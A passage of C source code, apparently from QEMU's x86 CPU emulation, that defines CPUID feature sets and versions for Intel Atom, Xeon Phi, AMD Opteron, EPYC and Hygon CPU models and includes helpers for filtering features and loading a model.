MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = 
VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Atom Processor (Denverton)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "monitor", "off" }, { "mpx", "off" }, { NULL /* end of list */ }, }, }, { 0 /* end of list */ }, }, }, { .name = "Snowridge", .level = 27, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 134, .stepping = 1, .features[FEAT_1_EDX] = /* missing: CPUID_PN CPUID_IA64 */ /* missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ CPUID_FP87 | CPUID_VME | CPUID_DE | CPUID_PSE | CPUID_TSC | CPUID_MSR | CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | CPUID_PSE36 | CPUID_CLFLUSH | CPUID_MMX | CPUID_FXSR | CPUID_SSE | CPUID_SSE2, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_X2APIC | CPUID_EXT_MOVBE | CPUID_EXT_POPCNT | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_AES | CPUID_EXT_XSAVE | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_LM, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_MPX | /* missing bits 13, 15 */ CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_SHA_NI, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_UMIP | /* missing bit 5 */ CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_MOVDIRI | CPUID_7_0_ECX_CLDEMOTE | CPUID_7_0_ECX_MOVDIR64B, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_ARCH_CAPABILITIES | CPUID_7_0_EDX_SPEC_CTRL_SSBD | CPUID_7_0_EDX_CORE_CAPABILITY, .features[FEAT_CORE_CAPABILITY] = MSR_CORE_CAP_SPLIT_LOCK_DETECT, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. 
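* (XSAVES itself is CPUID.(EAX=0DH,ECX=1):EAX bit 3, i.e. CPUID_XSAVE_XSAVES.)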
*/ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Atom Processor (SnowRidge)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "mpx", "off" }, { "model-id", "Intel Atom Processor (Snowridge, no MPX)" }, { NULL /* end of list */ }, }, }, { 0 /* end of list */ }, }, }, { .name = "KnightsMill", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 133, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SS | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, 
.features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512PF | CPUID_7_0_EBX_AVX512ER, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VPOPCNTDQ, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_AVX512_4VNNIW | CPUID_7_0_EDX_AVX512_4FMAPS, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .xlevel = 0x80000008, .model_id = "Intel Xeon Phi Processor (Knights Mill)", }, { .name = "Opteron_G1", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .xlevel = 0x80000008, .model_id = "AMD Opteron 240 (Gen 1 Class Opteron)", }, { .name = "Opteron_G2", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_CX16 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "AMD Opteron 22xx (Gen 2 Class Opteron)", }, { .name = "Opteron_G3", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 16, .model = 2, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_POPCNT | CPUID_EXT_CX16 | CPUID_EXT_MONITOR | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "AMD Opteron 23xx (Gen 3 Class Opteron)", }, { .name = "Opteron_G4", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 21, .model = 1, .stepping = 2, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP 
| CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, /* no xsaveopt! */ .xlevel = 0x8000001A, .model_id = "AMD Opteron 62xx class CPU", }, { .name = "Opteron_G5", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 21, .model = 2, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_TBM | CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, /* no xsaveopt! 
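* (These Opterons advertise XSAVE in CPUID[1].ECX but no XSAVEOPT, so the FEAT_XSAVE word stays empty.)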
*/ .xlevel = 0x8000001A, .model_id = "AMD Opteron 63xx class CPU", }, { .name = "EPYC", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 23, .model = 1, .stepping = 2, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "AMD EPYC Processor", .cache_info = &epyc_cache_info, .use_epyc_apic_id_encoding = 1, .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "EPYC-IBPB", .props = (PropValue[]) { { "ibpb", "on" }, { "model-id", "AMD EPYC Processor (with IBPB)" }, { NULL /* end of list */ } } }, { .version = 3, .props = (PropValue[]) { { "ibpb", "on" }, { "perfctr-core", "on" }, { "clzero", "on" }, { "xsaveerptr", "on" }, { "xsaves", "on" }, { "model-id", "AMD EPYC Processor" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Dhyana", .level = 0xd, .vendor = CPUID_VENDOR_HYGON, .family = 24, .model = 0, .stepping = 1, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_IBPB, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT, /* * Missing: XSAVES (not supported by some Linux versions, * 
including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "Hygon Dhyana Processor", .cache_info = &epyc_cache_info, }, { .name = "EPYC-Rome", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 23, .model = 49, .stepping = 0, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT | CPUID_EXT3_PERFCORE, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_CLZERO | CPUID_8000_0008_EBX_XSAVEERPTR | CPUID_8000_0008_EBX_WBNOINVD | CPUID_8000_0008_EBX_IBPB | CPUID_8000_0008_EBX_STIBP, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI | CPUID_7_0_EBX_CLWB, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_RDPID, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1 | CPUID_XSAVE_XSAVES, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "AMD EPYC-Rome Processor", .cache_info = &epyc_rome_cache_info, .use_epyc_apic_id_encoding = 1, }, }; /* * We resolve CPU model aliases using -v1 when using "-machine * none", but this is just for compatibility while libvirt isn't * adapted to resolve CPU model versions before creating VMs. * See "Runnability guarantee of CPU models" at * qemu-deprecated.texi. */ X86CPUVersion default_cpu_version = 1; void x86_cpu_set_default_version(X86CPUVersion version) { /* Translating CPU_VERSION_AUTO to CPU_VERSION_AUTO doesn't make sense */ assert(version != CPU_VERSION_AUTO); default_cpu_version = version; } #define CPUID_MODEL_ID_SZ 48 static bool x86_cpu_have_filtered_features(X86CPU *cpu) { FeatureWord w; for (w = 0; w < FEATURE_WORDS; w++) { if (cpu->filtered_features[w]) { return true; } } return false; } static void mark_unavailable_features(X86CPU *cpu, FeatureWord w, uint64_t mask, const char *verbose_prefix) { CPUX86State *env = &cpu->env; if (!cpu->force_features) { env->features[w] &= ~mask; } cpu->filtered_features[w] |= mask; if (!verbose_prefix) { return; } } /* Convert all '_' in a feature string option name to '-', to make feature * name conform to QOM property naming rule, which uses '-' instead of '_'. 
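* For example, "tsc_deadline" becomes "tsc-deadline".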
*/ static inline void feat2prop(char *s) { while ((s = strchr(s, '_'))) { *s = '-'; } } static void x86_cpu_filter_features(X86CPU *cpu, bool verbose); static uint64_t x86_cpu_get_supported_feature_word(FeatureWord w, bool migratable_only) { FeatureWordInfo *wi = &feature_word_info[w]; uint64_t r; // TCG only: return what the TCG backend can emulate (migratable_only is ignored) r = wi->tcg_features; return r; } /* Load data from X86CPUDefinition into a X86CPU object */ static void x86_cpu_load_model(X86CPU *cpu, X86CPUModel *model) { X86CPUDefinition *def = model->cpudef; CPUX86State *env = &cpu->env; FeatureWord w; env->cpuid_min_level = def->level; env->cpuid_xlevel = def->xlevel; x86_cpuid_version_set_family(cpu, def->family); x86_cpuid_version_set_model(cpu, def->model); x86_cpuid_version_set_stepping(cpu, def->stepping); x86_cpuid_set_model_id(cpu, def->model_id); for (w = 0; w < FEATURE_WORDS; w++) { env->features[w] = def->features[w]; } /* legacy-cache defaults to 'off' if CPU model provides cache info */ cpu->legacy_cache = !def->cache_info; env->features[FEAT_1_ECX] |= CPUID_EXT_HYPERVISOR; /* sysenter isn't supported in compatibility mode on AMD, * syscall isn't supported in compatibility mode on Intel. * Normally we advertise the actual CPU vendor, but you can * override this using the 'vendor' property if you want to use * KVM's sysenter/syscall emulation in 